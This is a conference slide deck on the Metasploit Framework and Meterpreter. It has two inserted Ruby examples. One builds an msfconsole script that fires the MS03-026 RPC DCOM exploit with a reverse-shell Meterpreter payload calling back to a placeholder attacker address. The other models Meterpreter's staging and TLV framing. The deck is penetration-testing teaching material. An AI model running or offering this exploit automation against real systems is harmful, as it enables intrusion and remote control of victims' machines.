BSides Algiers - Metasploit Framework - Oussama Elhamer

Posted on 13-May-2015


The Metasploit Framework

By Elhamer Oussama Abdelkhalek

Contents:
• Introduction:
  I. Basics
  II. Running an attack the old-fashioned way
  III. Overview of the Metasploit project and framework
  IV. Running the same attack using Metasploit
• Metasploit overview and basic framework usage:
  I. Metasploit architecture
  II. Consoles
• Meterpreter basics and overview

Exploitation!
• Vulnerability: a weakness that allows an attacker to break into a system's security.
• Exploit: code that allows an attacker to take advantage of a vulnerable system.
• Payload: code that runs on the system after exploitation.

Vulnerability - Exploit - Payload (diagram): Attacker sends Exploit + Payload to the Vulnerable System.
1. The exploit runs first.
2. The payload runs next, if the exploit succeeded: data download, uploading malware, ...

Run an Exploit the Old-Fashioned Way
• The vulnerability: RPC DCOM, a buffer overflow in the RPC interface.
• The exploit and the payload are available.

The Problem!
• A lot of exploits!
• Hard to customize the payload.
• Testing exploits and exploit research is painful!
• Metasploit is a shortcut.

What Is Metasploit?
• Metasploit has come to be synonymous with the Metasploit Framework.
• The Metasploit Project, whose goal is to provide information that will be useful in:
  I. Penetration testing
  II. IDS signature development
  III. Exploit research
• Developed by H.D. Moore in 2003, then acquired by Rapid7.
• Primarily written in Perl, then rewritten in Ruby ('the largest program ever written in Ruby'!).
• The framework is an open-source platform for developing, testing and using exploit code.
• The current "stable" version is version 4.
• Similar to the commercial products Canvas (Immunity) and Impact (Core).

Benefits
• Over 600 tested exploits and 200 payloads!
• Plug and play of payloads with exploits: match the payload to the exploit, and try different payloads with the same exploit code.
• Lots of tools and features for better and faster pentests.

Using Metasploit
• show – list the available modules (exploits, payloads, etc.)
• use – select a specific exploit module
• set – set specific variables (option names are matched case-insensitively; values are taken literally)
  – RHOST – remote host (who we're attacking)
  – PAYLOAD – the payload to carry
  – LHOST – local host (for phone-home attacks, e.g. a reverse shell)
• exploit – run the exploit
• RPC DCOM using Metasploit (demo).
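The use / set / exploit sequence above, as an added example that is not part of the original slides or of the Metasploit project: a small Ruby script that writes that sequence into an msfconsole resource script, so the same attack can be replayed non-interactively and the options are validated before the console is started. The exploit module and payload names are Metasploit's own names for the RPC DCOM exploit and a reverse Meterpreter payload; the 192.0.2.x addresses are documentation placeholders, and the console and option names used are the ones listed on the slide.

```ruby
# Added example (not from the slides or the Metasploit project): emit an
# msfconsole resource script that replays the use / set / exploit sequence.
# Assumptions: module and payload names are Metasploit's own
# (exploit/windows/dcerpc/ms03_026_dcom, windows/meterpreter/reverse_tcp);
# 192.0.2.x addresses are documentation placeholders.

# Every exploit needs a target; reverse payloads additionally need somewhere to call back to.
def required_options(payload)
  payload.include?('reverse') ? %w[RHOST LHOST] : %w[RHOST]
end

# Returns the script lines in the order msfconsole will execute them.
def build_resource_script(exploit:, payload:, options:)
  # Option names are matched case-insensitively by the console; normalise anyway so
  # the missing-option check below works whatever case the caller used.
  opts = options.to_h { |k, v| [k.to_s.upcase, v.to_s] }
  missing = required_options(payload) - opts.keys
  raise ArgumentError, "missing options: #{missing.join(', ')}" unless missing.empty?

  lines = ["use #{exploit}", "set PAYLOAD #{payload}"]
  opts.sort.each { |name, value| lines << "set #{name} #{value}" }
  lines << 'check'          # modules that implement a check report whether the target looks vulnerable
  lines << 'exploit -j -z'  # run as a background job and leave the session for a later `sessions -i`
  lines
end

# Write the lines to a .rc file; returns the path for convenience.
def write_resource_script(path, lines)
  File.write(path, lines.join("\n") + "\n")
  path
end

if __FILE__ == $0
  script = build_resource_script(
    exploit: 'exploit/windows/dcerpc/ms03_026_dcom',
    payload: 'windows/meterpreter/reverse_tcp',
    options: { rhost: '192.0.2.10', lhost: '192.0.2.1', lport: 4444 }
  )
  puts script   # save as attack.rc, then run: msfconsole -q -r attack.rc
end
```

Swapping the payload is a one-word change to the `payload:` argument, which is the plug-and-play property the Benefits slide describes; a bind payload drops the LHOST requirement automatically.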

Using Metasploit (screenshot slide)

Metasploit Architecture (diagram slide)

Meterpreter
• What we are looking for is a payload which:
  - avoids creating a new process;
  - runs in the exploited process's context;
  - does not create a new file on disk;
  - can import more functionality (is extensible) rather than being limited to the commands of the remote shell it created.
• That is exactly what Meterpreter does!

Meterpreter Basics
• Post-exploitation tool
• Works by in-memory DLL injection
• Does not create any files on disk
• Uses encrypted communication between the victim and the attacker
• Stable, flexible and extensible!
• Can be extended at runtime by shipping DLLs to the victim

How It Works
• When the exploit succeeds:
• The exploit runs the first-stage payload
• The payload connects back to msf
• The second-stage (DLL-injection) payload is sent
• msf sends the Meterpreter server DLL
• Client and server communicate

Using Meterpreter • DEMO

Client-Server Communication in Meterpreter
• The communication is encrypted.
• Messages are in the form of TLVs (Type, Length, Value).
• So multiple channels of communication can use the same client-server connection.
• This allows multiple programs running on the victim to communicate at the same time.
• Demo.
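The staging sequence from "How It Works" and the TLV framing described on this slide, as one added Ruby example that is not Meterpreter's or Metasploit's own code: the handler sends a length-prefixed second stage, after which both sides exchange packets built from TLVs, and the channel-id TLV inside each packet is what lets several channels (a shell and a file transfer, say) share one connection and be separated again on the other end. The type constants and the `core_channel_write` method name are modelled on the definitions in Metasploit's Rex::Post::Meterpreter packet code, but the framing here is deliberately simplified, omits the transport encryption the slide mentions, and is not byte-compatible with any real Meterpreter version; the stage bytes are a constructed stand-in for the server DLL.

```ruby
# Added example (not Metasploit code): a simplified model of the Meterpreter
# transport from the slides: a length-prefixed second stage, then TLV-framed
# packets that carry data for several channels over one connection.
# Constants are modelled on Rex::Post::Meterpreter's packet definitions; the
# framing is simplified and not byte-compatible with any real version.
require 'stringio'

TLV_META_TYPE_STRING = 1 << 16
TLV_META_TYPE_UINT   = 1 << 17
TLV_META_TYPE_RAW    = 1 << 18
TLV_TYPE_METHOD       = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID   = TLV_META_TYPE_STRING | 2
TLV_TYPE_RESULT       = TLV_META_TYPE_UINT   | 4
TLV_TYPE_CHANNEL_ID   = TLV_META_TYPE_UINT   | 50
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW    | 51
PACKET_TYPE_REQUEST   = 0

# Stage 1: the small stager reads a 4-byte little-endian length, then that many bytes of stage.
def send_stage(io, stage)
  io.write([stage.bytesize].pack('V') + stage.b)
end

def recv_stage(io)
  io.read(io.read(4).unpack1('V'))
end

# Stage 2: TLV framing. One TLV = 4-byte big-endian length (including this 8-byte
# header), 4-byte type, value. The meta-type bits say how to encode the value.
def encode_tlv(type, value)
  bytes = if (type & TLV_META_TYPE_STRING) != 0 then value.to_s.b + "\0"  # strings are NUL-terminated
          elsif (type & TLV_META_TYPE_UINT) != 0 then [value].pack('N')
          else value.b                                                      # raw bytes as-is
          end
  [bytes.bytesize + 8, type].pack('NN') + bytes
end

def decode_tlv(type, bytes)
  if (type & TLV_META_TYPE_STRING) != 0 then bytes.chomp("\0")
  elsif (type & TLV_META_TYPE_UINT) != 0 then bytes.unpack1('N')
  else bytes
  end
end

# A packet is itself a group TLV: header (total length, packet type) followed by TLVs.
def encode_packet(packet_type, tlvs)
  body = tlvs.map { |t, v| encode_tlv(t, v) }.join
  [body.bytesize + 8, packet_type].pack('NN') + body
end

# Read exactly one packet from a stream and return [packet_type, {tlv_type => value}].
def read_packet(io)
  header = io.read(8)
  raise 'short read' if header.nil? || header.bytesize < 8
  len, ptype = header.unpack('NN')
  body = io.read(len - 8)
  tlvs = {}
  until body.empty?
    tlen, ttype = body.unpack('NN')
    raise 'malformed TLV' if tlen < 8 || tlen > body.bytesize   # reject truncated or oversized lengths
    tlvs[ttype] = decode_tlv(ttype, body.byteslice(8, tlen - 8))
    body = body.byteslice(tlen..-1)
  end
  [ptype, tlvs]
end

# A channel write request: the channel id is what lets many streams share one socket.
def channel_write(channel_id, data, request_id)
  encode_packet(PACKET_TYPE_REQUEST, [
    [TLV_TYPE_METHOD, 'core_channel_write'],
    [TLV_TYPE_REQUEST_ID, request_id],
    [TLV_TYPE_CHANNEL_ID, channel_id],
    [TLV_TYPE_CHANNEL_DATA, data]
  ])
end

# Run the whole exchange through an in-memory "wire" and return the bytes seen per channel.
def demo_session
  wire = StringIO.new(''.b)
  stage = ("\x90" * 64 + 'METSRV stand-in (constructed)').b   # constructed placeholder, not a real DLL
  send_stage(wire, stage)
  # Two channels (e.g. a shell and a file download) interleaved on the same connection.
  wire.write(channel_write(1, "whoami\n", 'req-1'))
  wire.write(channel_write(2, "\x00\x01\x02\x03", 'req-2'))
  wire.write(channel_write(1, "ipconfig\n", 'req-3'))
  wire.rewind

  raise 'stage mismatch' unless recv_stage(wire) == stage
  per_channel = Hash.new { |h, k| h[k] = +'' }
  3.times do
    _ptype, tlvs = read_packet(wire)
    per_channel[tlvs[TLV_TYPE_CHANNEL_ID]] << tlvs[TLV_TYPE_CHANNEL_DATA]
  end
  per_channel
end

puts demo_session.inspect if __FILE__ == $0
```

The length check in `read_packet` is the one a practitioner should not skip: a TLV whose declared length is shorter than its own header or longer than the remaining body is the classic place a hand-rolled parser over-reads, on either side of the connection.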
